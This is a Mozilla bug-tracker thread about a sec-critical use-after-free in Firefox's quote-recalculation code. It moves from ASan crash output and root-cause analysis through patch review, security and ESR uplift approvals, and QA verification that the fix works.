  0x0c0c8004b480: 00 00 00 00 fa fa fa fa 00 00 00 00 00 00 00 fa
  0x0c0c8004b490: fa fa fa fa 00 00 00 00 00 00 00 00 fa fa fa fa
=>0x0c0c8004b4a0: 00 00 00 00 00 00 00 00 fa fa fa fa fd[fd]fd fd
  0x0c0c8004b4b0: fd fd fd fd fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c0c8004b4c0: fa fa fa fa 00 00 00 00 00 00 00 fa fa fa fa fa
  0x0c0c8004b4d0: 00 00 00 00 00 00 00 00 fa fa fa fa 00 00 00 00
  0x0c0c8004b4e0: 00 00 00 00 fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c0c8004b4f0: fa fa fa fa 00 00 00 00 00 00 00 00 fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==12107==ABORTING

Comment 1

[Nils]

Attachment: ASAN output

Comment 2

[Ryan VanderMeulen [:RyanVM]]

INFO: Last good revision: fc88372ecc305e3d2a3bc53315b662cc4d789713
INFO: First bad revision: a5868249ff1d0ac1065dac11ba2116d6e42ff8c6
INFO: Pushlog:
https://hg.mozilla.org/integration/mozilla-inbound/pushloghtml?fromchange=fc88372ecc305e3d2a3bc53315b662cc4d789713&tochange=a5868249ff1d0ac1065dac11ba2116d6e42ff8c6

Bug 1291707 maybe?

Comment 3

[Xidorn Quan [:xidorn] UTC+11]

So this is because nsQuoteList::RecalcAll() calls nsTextNode::SetData(), which then triggers some event handler and the event handler then makes the frame constructor try to reconstruct the frame tree.

When going back to the nsQuoteList::RecalcAll(), all old nodes have been destroyed by nsGenConList::Clear() because of the frame tree reconstruction, and thus the loop variable would be holding a dangling pointer.

nsQuoteList::RecalcAll() being able to invoke script code sounds clearly wrong, and putting a script blocker in nsCSSFrameConstructor::RecalcQuotesAndCounters() fixes this issue. But I'm not completely sure whether it is the right thing to do here, I mean, whether there is any other unexpected thing happening here.

Comment 4

[Xidorn Quan [:xidorn] UTC+11]

Attachment: stack from nsQuoteList::RecalcAll to nsGenConList::Clear

This is the stack from nsQuoteList::RecalcAll() to nsGenConList::Clear() as a reference.

Comment 5

[Xidorn Quan [:xidorn] UTC+11]

Attachment: proposed patch

Another option, I guess, is to add a non-notifying SetData to nsGenericDOMDataNode, and use that instead. Not sure which is better.

Comment 6

[Boris Zbarsky [:bzbarsky]]

Ugh.  This frameloader landmine that keeps popping up in EndUpdate is ridiculous.  Could you please file a followup to move whoever is hacking into that over to properly using scriptrunners?

For now, using a scriptblocker here is the right thing.

Comment 7

[Xidorn Quan [:xidorn] UTC+11]

It's not clear to me what do you mean. Could you please file that followup yourself?

Comment 8

[Xidorn Quan [:xidorn] UTC+11]

Comment on attachment 8868806 [details] [diff] [review]
proposed patch

[Security approval request comment]
How easily could an exploit be constructed based on the patch?
Maybe not very easy. I don't even fully understand how the original testcase work, to be honest...

Do comments in the patch, the check-in comment, or tests included in the patch paint a bulls-eye on the security problem?
Simple one-line change, no comment, and I guess we can strip the commit message.

Which older supported branches are affected by this flaw?
At least ESR 52. ESR 45 doesn't seem to be affected since it seems to invoke RecalcQuotesAndCounters() at a different place.

If not all supported branches, which bug introduced the flaw?
Not clear. Bug 1291707 at least seems to make things worse.

Do you have backports for the affected branches? If not, how different, hard to create, and risky will they be?
This patch can probably be uplifted to whatever version without much risk.

How likely is this patch to cause regressions; how much testing does it need?
I think it is unlikely.

Comment 9

[Gerry Chang [:gchang]]

Track 54+/55+ as sec-critical.

Comment 10

[Boris Zbarsky [:bzbarsky]]

I filed bug 1365948.

Comment 11

[Al Billings [:abillings - ex-MoCo]]

sec-approval+ for trunk. 
Please nominate beta and ESR52 patches for uplift as well.

Comment 12

[Xidorn Quan [:xidorn] UTC+11]

Comment on attachment 8868806 [details] [diff] [review]
proposed patch

Approval Request Comment
[Feature/Bug causing the regression]: Not clear. Bug 1291707 at least seems to make things worse.
[User impact if declined]: security issue
[Is this code covered by automated tests?]: apparently not :)
[Has the fix been verified in Nightly?]: landing
[Needs manual test from QE? If yes, steps to reproduce]: open the testcase attached
[List of other uplifts needed for the feature/fix]: n/a
[Is the change risky?]: no
[Why is the change risky/not risky?]: small change
[String changes made/needed]: n/a

Comment 13

[Xidorn Quan [:xidorn] UTC+11]

Comment on attachment 8868806 [details] [diff] [review]
proposed patch

[Approval Request Comment]
If this is not a sec:{high,crit} bug, please state case for ESR consideration: it is a sec-critical
User impact if declined: security issue
Fix Landed on Version: landing
Risk to taking this patch (and alternatives if risky): not risky
String or UUID changes made by this patch: n/a

See https://wiki.mozilla.org/Release_Management/ESR_Landing_Process for more info.

Comment 14

[Ryan VanderMeulen [:RyanVM]]

https://hg.mozilla.org/integration/mozilla-inbound/rev/7828515b45be925c7a5c9cf7a951109abbc55921

Comment 15

[Julien Cristau [:jcristau] (back April 22)]

Comment on attachment 8868806 [details] [diff] [review]
proposed patch

uaf, sec-crit, esr52+ and beta54+

Comment 16

[Ryan VanderMeulen [:RyanVM]]

https://hg.mozilla.org/mozilla-central/rev/7828515b45be

Comment 17

[Ryan VanderMeulen [:RyanVM]]

https://hg.mozilla.org/releases/mozilla-beta/rev/72da880beaeb
https://hg.mozilla.org/releases/mozilla-esr52/rev/aad883966edd

Comment 18

[Andrei Vaida [:avaida]]

Reproduced the crash on Ubuntu 16.04 x64 using an affected build (52.1.2esr linux64-asan from 2017-05-17, 20170517192401) and the test case provided by Nils in Comment 0.


This bug is verified fixed on Ubuntu 16.04 x64 using the following builds:

  * 55.0a1 linux64-asan from 2017-06-09 (20170609011144)
  * 55.0a1 from 2017-06-08 (20170607123825)
  * 54.0b linux64-asan from 2017-06-08 (20170608174002)
  * 54.0 (20170608175746)
  * 52.2.0esr linux64-asan from 2017-06-08 (20170608175922)
  * 52.2.0esr (20170607123825)

The test case is no longer crashing.